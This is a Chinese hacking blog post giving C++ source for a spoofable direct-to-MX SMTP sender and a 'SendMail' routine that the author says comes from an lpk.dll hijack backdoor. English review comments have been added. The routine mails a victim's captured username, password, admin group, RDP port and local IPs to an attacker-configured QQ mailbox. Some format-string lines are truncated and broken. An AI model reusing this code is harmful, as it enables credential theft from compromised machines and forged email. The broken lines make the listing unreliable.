源码下载地址 (MFC)
http://www.vdisk.cn/down/index/10021464
核心代码如下 (可以用任意域名发信)
// MFC button handler: collects the mail fields from the dialog and hands one
// message straight to mx0.qq.com:25 over SMTP (greeting, HELO, MAIL FROM,
// RCPT TO, DATA, body, QUIT), checking the 3-digit reply code after each step.
// No AUTH step is sent and the HELO domain comes from a dialog field, so the
// sending identity is whatever was typed; whether such mail is accepted is
// decided by the receiving server's own sender checks (e.g. SPF/DKIM/DMARC).
// IsSameString is not part of this listing; presumably it compares the first
// 3 characters of the reply with the expected code -- confirm.
void
CSendFastMailDlg::OnBtnTest()
{
// TODO: Add your control notification handler code here
char
buff[100];
CString
curuser;
CString
curmailfrom;
CString
currcptto;
CString
curdomain;
CString
strsubject;
CString
strmessagebody;
CString
strtemp;
CString strmail;
//curuser="abc";
// Pull the sender domain, recipient, sender nickname, subject and body from the dialog.
GetDlgItemText(IDC_EDIT_CURDOMAIN,curdomain);
GetDlgItemText(IDC_EDIT_RCPTTO,currcptto);
GetDlgItemText(IDC_EDIT_MAILSENDERNICK,curuser);
GetDlgItemText(IDC_EDIT_SUBJECT,strsubject);
GetDlgItemText(IDC_EDIT_MESSAGEBODY,strmessagebody);
// The recipient field holds only the local part; the domain is fixed to qq.com.
currcptto+="@qq.com";
// NOTE(review): the format string of this call is missing in this listing, so
// the layout of the sender address cannot be read from here.
curmailfrom.Format(");
memset(buff,0,100);
if(!m_socket.Create())
{
MessageBox("创建socket失败.");
return;
}
// Direct connection to the recipient domain's mail exchanger, plain SMTP on port 25.
if(!m_socket.Connect("mx0.qq.com",25))
{
MessageBox("连接服务器失败");
return;
}
// After connecting, read the server greeting
// NOTE(review): the return value of Receive is ignored here and below, and a
// full 100-byte read leaves buff without a terminating NUL.
m_socket.Receive(buff,100);
if
(!IsSameString(buff,3,"220"))
{
m_socket.Close();
MessageBox(buff,"220错误");
return;
}
// Send the HELO command
// NOTE(review): unbounded sprintf into the 100-byte buff with dialog text, and
// a CString object is passed to a %s vararg without a cast (same pattern in
// the MAIL FROM and RCPT TO steps below).
sprintf(buff,"HELO
%s\r\n",curdomain);
m_socket.Send(buff,strlen(buff));
m_socket.Receive(buff,100);
if
(!IsSameString(buff,3,"250"))
{
m_socket.Send("QUIT\r\n",strlen("QUIT\r\n"));
//m_socket.Receive(buff,100);
m_socket.Close();
MessageBox(buff,"HELO命令返回错误");
return;
}
// Send the MAIL FROM command
sprintf(buff,"MAIL
FROM:<%s>\r\n",curmailfrom);
m_socket.Send(buff,strlen(buff));
m_socket.Receive(buff,100);
if
(!IsSameString(buff,3,"250"))
{
m_socket.Send("QUIT\r\n",strlen("QUIT\r\n"));
//m_socket.Receive(buff,100);
m_socket.Close();
MessageBox(buff,"MAIL
FROM命令返回错误");
return;
}
// Send the RCPT TO command
sprintf(buff,"RCPT
TO:<%s>\r\n",currcptto);
m_socket.Send(buff,strlen(buff));
m_socket.Receive(buff,100);
// 550: the server rejected the recipient. Close() is commented out on this
// path, so the socket is still open when the handler returns.
if
(IsSameString(buff,3,"550"))
{
m_socket.Send("QUIT\r\n",strlen("QUIT\r\n"));
m_socket.Receive(buff,100);
//m_socket.Close();
strtemp.Format("你的邮件收件人地址不存在\r\n服务器信息:%s",buff);
MessageBox(strtemp);
return;
}
if
(!IsSameString(buff,3,"250"))
{
m_socket.Send("QUIT\r\n",strlen("QUIT\r\n"));
//m_socket.Receive(buff,100);
m_socket.Close();
MessageBox(buff,"RCPT
TO命令返回错误");
return;
}
// DATA must be answered with 354 before the message is sent.
sprintf(buff,"DATA\r\n");
m_socket.Send(buff,strlen(buff));
m_socket.Receive(buff,100);
if
(!IsSameString(buff,3,"354"))
{
m_socket.Send("QUIT\r\n",strlen("QUIT\r\n"));
//m_socket.Receive(buff,100);
m_socket.Close();
MessageBox(buff,"DATA命令返回错误");
return;
}
// Build the message in the expected format
// The nickname, subject and body are placed into the message exactly as typed
// in the dialog; no filtering is visible in this function.
strmail="";
strtemp.Format("From:
\"%s\"
<%s>\r\n",curuser,curmailfrom);
strmail+=strtemp;
strtemp.Format("To:
<%s>\r\n",currcptto);
strmail+=strtemp;
strtemp.Format("Subject:
%s\r\n",strsubject);
strmail+=strtemp;
// The UTC offset in the Date header is the literal +0800, not derived from the
// local time zone.
CTime
time=CTime::GetCurrentTime();
strtemp=time.Format("Date:
%a,%d %b %Y %X +0800\r\n"); // e.g. "Date: Thu, 30 Aug 2007 15:23:32 +0800\r\n"; reserved date field
strmail+=strtemp;
// Single text/html part inside a multipart/mixed container with a fixed boundary string.
strtemp="Content-Type:
multipart/mixed;
boundary=\"#BOUNDARY.CMAILSERVER#\"\r\n\r\n\r\n";
strmail+=strtemp;
strtemp="--#BOUNDARY.CMAILSERVER#\r\n";
strmail+=strtemp;
strtemp="Content-Type:
text/html; charset=\"gb2312\"\r\nContent-Transfer-Encoding:
7bit\r\n\r\n";
strmail+=strtemp;
strmail+=strmessagebody;
// Closing boundary, then the lone "." line that ends the DATA section.
strtemp="\r\n\r\n--#BOUNDARY.CMAILSERVER#--\r\n\r\n.\r\n";
strmail+=strtemp;
// Send the message body
m_socket.Send(strmail,strmail.GetLength());
m_socket.Receive(buff,100);
if
(!IsSameString(buff,3,"250"))
{
m_socket.Send("QUIT\r\n",strlen("QUIT\r\n"));
//m_socket.Receive(buff,100);
m_socket.Close();
// The title text is the same one used for the DATA check above.
MessageBox(buff,"DATA命令返回错误");
return;
}
// Send the QUIT command
sprintf(buff,"QUIT\r\n");
m_socket.Send(buff,strlen(buff));
m_socket.Receive(buff,100);
// A reply other than 221 returns here without calling Close().
if
(!IsSameString(buff,3,"221"))
{
MessageBox(buff,"QUIT命令返回错误");
return;
}
m_socket.Close();
MessageBox("发送成功");
}
接下来贴上 exe 后门发信的代码，这段代码是从最近给泪少写的 lpk.dll 劫持里提取出来的
// Reporting routine which, per the page, was lifted from an lpk.dll hijack
// backdoor: it mails the account details held in modify_data, the RDP port
// read from the registry and the local IP list to the address in
// modify_data.m_mail by talking SMTP directly to mx0.qq.com:25.
// modify_data, LOGFILE and IsSameString are defined outside this listing.
// Observable behaviour for detection, all visible below: an open of the
// RDP-Tcp WinStations key with KEY_ALL_ACCESS, a lookup of mx0.qq.com followed
// by an outbound connection to TCP/25 from the host process, and a message
// carrying the fixed subject text and the "#BOUNDARY.CMAILSERVER#" boundary.
void SendMail()
{
StartupSocket();
char
buff[100] =
{0};
char
curuser[MAX_PATH] =
{0}; // display name
char
curmailfrom[MAX_PATH] = {0};
char
currcptto[MAX_PATH] =
{0}; // address the mail is sent to
char
curdomain[MAX_PATH] =
{0}; // domain
char
strsubject[MAX_PATH] =
{"你的lpk.dll提权回信啦"};
char
strmessagebody[512]
=
{0}; // message content
char
strtemp[MAX_PATH] =
{0};
char
strmail[1024] =
{0};
char
strIP[MAX_PATH]
= {0};
// HELO domain, recipient and display name come from the embedded configuration.
// NOTE(review): unbounded strcpy; the sizes of the modify_data fields are not
// visible in this listing.
strcpy(curdomain,modify_data.m_domain);
strcpy(currcptto,modify_data.m_mail);
strcpy(curuser,modify_data.m_muser);
HKEY
hkey;
char
he[MAX_PATH]="SYSTEM\\CurrentControlSet\\Control\\Terminal
Server\\WinStations\\RDP-Tcp\\";
// The failure branch is empty, so a failed open still falls through to the
// query and close below with hkey unset.
if(ERROR_SUCCESS!=RegOpenKeyEx(HKEY_LOCAL_MACHINE,he,0,KEY_ALL_ACCESS,&hkey))
{
//MessageBox(NULL,"打开失败了","xc",NULL);
}
DWORD
sz;
DWORD
type_2=REG_DWORD;
// NOTE(review): cbData_2 announces 80 bytes while the destination sz is a
// single DWORD; the query result is not checked, so sz may stay uninitialised.
DWORD
cbData_2=80;
RegQueryValueEx(hkey,"PortNumber",NULL,&type_2,(unsigned
char
*)&sz,&cbData_2);// query the port-3389 (RDP) setting
RegCloseKey(hkey);
// NOTE(review): the format string of this call is missing in this listing, so
// the layout of the sender address cannot be read from here.
sprintf(curmailfrom,");
// Body text: user name, password, admin group and RDP port. The dialogue below
// has no STARTTLS step, so these travel as plain text on the wire.
sprintf(strmessagebody,"用户名:%s\n,密码:%s\n,管理组:%s\n,端口:%d\n",modify_data.user,
modify_data.pass,modify_data.admin,sz);
SOCKET sock
= socket(AF_INET,SOCK_STREAM,0);
// NOTE(review): the gethostbyname result is dereferenced without a NULL check.
HOSTENT
*host = gethostbyname("mx0.qq.com");
// The first resolved address is printed as a dotted string and parsed back by inet_addr.
char
temp[MAX_PATH] = {0};
sprintf(temp,"%d.%d.%d.%d",
host->h_addr_list[0][0]&0x00ff,
host->h_addr_list[0][1]&0x00ff,
host->h_addr_list[0][2]&0x00ff,
host->h_addr_list[0][3]&0x00ff);
SOCKADDR_IN
sa;
sa.sin_addr.s_addr =
inet_addr(temp);
sa.sin_family
= AF_INET;
sa.sin_port
= htons(25);
// This failure path returns without closesocket() or WSACleanup().
if(SOCKET_ERROR ==
connect(sock,(sockaddr*)&sa,sizeof(sa)))
{
LOGFILE("连接服务器失败");
return;
}
// After connecting, read the server greeting
recv(sock,buff,100,0);
if
(!IsSameString(buff,3,"220"))
{
closesocket(sock);
LOGFILE("220错误");
return;
}
// Send the HELO command
sprintf(buff,"HELO
%s\r\n",curdomain);
send(sock,buff,strlen(buff),0);
recv(sock,buff,100,0);
// Unlike the later checks, this failure path returns without closesocket().
if
(!IsSameString(buff,3,"250"))
{
LOGFILE("HELO命令返回错误");
return;
}
// Send the MAIL FROM command
sprintf(buff,"MAIL
FROM:<%s>\r\n",curmailfrom);
send(sock,buff,strlen(buff),0);
recv(sock,buff,100,0);
if
(!IsSameString(buff,3,"250"))
{
send(sock,"QUIT\r\n",strlen("QUIT\r\n"),0);
closesocket(sock);
LOGFILE("MAIL
FROM命令返回错误");
return;
}
// Send the RCPT TO command
sprintf(buff,"RCPT
TO:<%s>\r\n",currcptto);
send(sock,buff,strlen(buff),0);
recv(sock,buff,100,0);
// 550: the server rejected the recipient address.
if
(IsSameString(buff,3,"550"))
{
send(sock,"QUIT\r\n",strlen("QUIT\r\n"),0);
recv(sock,buff,100,0);
closesocket(sock);
LOGFILE("你的邮件收件人地址不存在\r\n服务器信息:%s",buff);
return;
}
if
(!IsSameString(buff,3,"250"))
{
send(sock,"QUIT\r\n",strlen("QUIT\r\n"),0);
closesocket(sock);
// NOTE(review): here the server reply buff is the first argument, unlike the
// other LOGFILE calls; LOGFILE's signature is not visible -- confirm.
LOGFILE(buff,"RCPT
TO命令返回错误");
return;
}
// DATA must be answered with 354 before the message is sent.
sprintf(buff,"DATA\r\n");
send(sock,buff,strlen(buff),0);
recv(sock,buff,100,0);
if
(!IsSameString(buff,3,"354"))
{
send(sock,"QUIT\r\n",strlen("QUIT\r\n"),0);
closesocket(sock);
LOGFILE("DATA命令返回错误");
return;
}
// Build the message in the expected format
// Each piece is formatted into strtemp and appended to the 1024-byte strmail
// with strcat; no length check is visible.
sprintf(strtemp,"From:
\"%s\"
<%s>\r\n",curuser,curmailfrom);
strcat(strmail,strtemp);
sprintf(strtemp,"To:
<%s>\r\n",currcptto);
strcat(strmail,strtemp);
sprintf(strtemp,"Subject:
%s\r\n",strsubject);
strcat(strmail,strtemp);
// sys is filled here but not read again in this function.
SYSTEMTIME
sys;
GetLocalTime(&sys);
// Disabled MFC variant kept from the dialog version:
// CTime time= GetCurrentTime();
// strtemp=time.Format("Date: %a,%d %b %Y %X +0800\r\n"); // e.g. "Date: Thu, 30 Aug 2007 15:23:32 +0800\r\n"; reserved date field
// The UTC offset in the Date header is the literal +0800.
time_t t =
time(0);
strftime(strtemp,sizeof(strtemp),"Date:
%a,%d %b %Y %X
+0800\r\n",localtime(&t));
strcat(strmail,strtemp);
// Single text/html part inside a multipart/mixed container with a fixed boundary string.
sprintf(strtemp,"Content-Type:
multipart/mixed;
boundary=\"#BOUNDARY.CMAILSERVER#\"\r\n\r\n\r\n");
strcat(strmail,strtemp);
sprintf(strtemp,"--#BOUNDARY.CMAILSERVER#\r\n");
strcat(strmail,strtemp);
sprintf(strtemp,"Content-Type:
text/html; charset=\"gb2312\"\r\nContent-Transfer-Encoding:
7bit\r\n\r\n");
strcat(strmail,strtemp);
strcat(strmail,strmessagebody);
// The local IP list from GetLocalIP is written to the log and appended to the body.
ZeroMemory(strtemp,MAX_PATH);
GetLocalIP(strtemp,MAX_PATH);
LOGFILE(strtemp);
strcat(strmail,strtemp);
// Closing boundary, then the lone "." line that ends the DATA section.
sprintf(strtemp,"\r\n\r\n--#BOUNDARY.CMAILSERVER#--\r\n\r\n.\r\n");
strcat(strmail,strtemp);
// Send the message body
send(sock,strmail,strlen(strmail),0);
recv(sock,buff,100,0);
if
(!IsSameString(buff,3,"250"))
{
send(sock,"QUIT\r\n",strlen("QUIT\r\n"),0);
closesocket(sock);
LOGFILE("DATA命令返回错误,%s",buff);
return;
}
// Send the QUIT command
sprintf(buff,"QUIT\r\n");
send(sock,buff,strlen(buff),0);
recv(sock,buff,100,0);
// A reply other than 221 returns here without closesocket().
if
(!IsSameString(buff,3,"221"))
{
LOGFILE("QUIT命令返回错误,%s",buff);
return;
}
closesocket(sock);
LOGFILE("发送成功");
// WSACleanup is reached only on this success path; every early return above skips it.
WSACleanup();
}
///////////////////////////////////////////////////////////下面是以上函数申明 ///代码来自http://hi.baidu.com/hackxhj/blog/////////////
// Initialises Winsock, requesting version 2.2.
// Returns FALSE when WSAStartup fails or when the negotiated version is not
// exactly 2.2 (WSACleanup is called first in that case); returns TRUE otherwise.
BOOL
StartupSocket()
{
WORD
wVersionRequested;
WSADATA
wsaData;
int
err;
wVersionRequested =
MAKEWORD( 2, 2 );
err =
WSAStartup( wVersionRequested, &wsaData
);
if ( err !=
0 ) return FALSE;
// WSAStartup succeeded but reported another version: undo the startup and fail.
if ( LOBYTE(
wsaData.wVersion ) != 2 ||HIBYTE( wsaData.wVersion ) != 2
)
{
WSACleanup();
return
FALSE;
}
return
TRUE;
}
// Walks the adapter list starting at pAdapterInfo and appends a heap copy of
// every non-empty IP address string to IPVector.
// Adapters whose Description starts with "VMware" (case-insensitive) are skipped.
// Each copy is allocated with new[]; FreeVector in this listing releases them
// with delete[].
void
GetNetworkParameter(PIP_ADAPTER_INFO
pAdapterInfo,vector<char*>&
IPVector)
{
while
(pAdapterInfo != NULL)
{
if(0
==
strnicmp(pAdapterInfo->Description,"VMware",strlen("VMware")))// skip VMware adapters (non-virtual-machine only)
{
pAdapterInfo
= pAdapterInfo->Next;
continue;
}
// An adapter can carry several addresses; follow its IpAddressList chain.
PIP_ADDR_STRING
IPList =
&(pAdapterInfo->IpAddressList);
while(IPList)
{
int
nCount =
strlen(IPList->IpAddress.String);
if(0
!= nCount)
{
// +1 for the terminating NUL copied by strcpy.
char*
pAddr = new char[nCount+1];
strcpy(pAddr,IPList->IpAddress.String);
IPVector.push_back(pAddr);
}
IPList
= IPList->Next;
}
pAdapterInfo
= pAdapterInfo->Next;
}
}
// Releases every string held in IPVector with delete[] and then empties the
// vector. The elements are expected to come from new char[], as
// GetNetworkParameter in this listing allocates them.
void
FreeVector(vector<char*>&
IPVector)
{
// NOTE(review): the int index is compared with the unsigned size().
for (int
i=0; i<IPVector.size(); i++)
{
char *
PTemp = IPVector[i];
delete
[]PTemp;
}
IPVector.clear();
}
// Fills IPList with the local adapter addresses: calls GetAdaptersInfo with a
// buffer sized for one IP_ADAPTER_INFO and, on ERROR_BUFFER_OVERFLOW, retries
// with a buffer of the size the first call wrote to len. The addresses are
// collected by GetNetworkParameter.
void
GetLocalIPList(vector<char*>&
IPList)
{
unsigned
long
len =
sizeof(IP_ADAPTER_INFO);
// NOTE(review): neither malloc result in this function is checked for NULL.
PIP_ADAPTER_INFO pinfo =
(PIP_ADAPTER_INFO)malloc(len);
unsigned
long nError;
nError =
GetAdaptersInfo(pinfo,&len);
if
(ERROR_SUCCESS == nError)
{
GetNetworkParameter(pinfo,IPList);
}
if
(ERROR_BUFFER_OVERFLOW == nError)
{
// NOTE(review): pinfo is reassigned without freeing the first buffer, and the
// result of the second GetAdaptersInfo call is not checked before use.
pinfo
= (PIP_ADAPTER_INFO)malloc(len);
GetAdaptersInfo(pinfo,&len);
GetNetworkParameter(pinfo,IPList);
}
// Frees whichever buffer pinfo points to at this point.
free(pinfo);
}
// Appends one "IP<index>=<address>," entry per local address to pBuffer.
// pBuffer must already hold a NUL-terminated string because entries are added
// with strcat; nSize is the space the caller says is available.
void GetLocalIP(char *pBuffer,
int nSize)
{
vector<char*>
IPList;
GetLocalIPList(IPList);
// NOTE(review): the int index is compared with the unsigned size().
for (int
i=0; i<IPList.size(); i++)
{
int
nCount = strlen(IPList[i]);
// An address is appended only while the remaining budget exceeds its length.
if(nSize>nCount)
{
char
pTemp[30] = {0};
sprintf(pTemp,"IP%d=%s,",i,IPList[i]);
strcat(pBuffer,pTemp);
// NOTE(review): the budget drops by nCount+4, while the appended entry is
// nCount plus at least 5 characters ("IP", the index digits, "=" and ",").
nSize
=nSize- nCount-4;
}
}
FreeVector(IPList);
}
转载请说明来自 http://blog.sina.com.cn/XGNHACK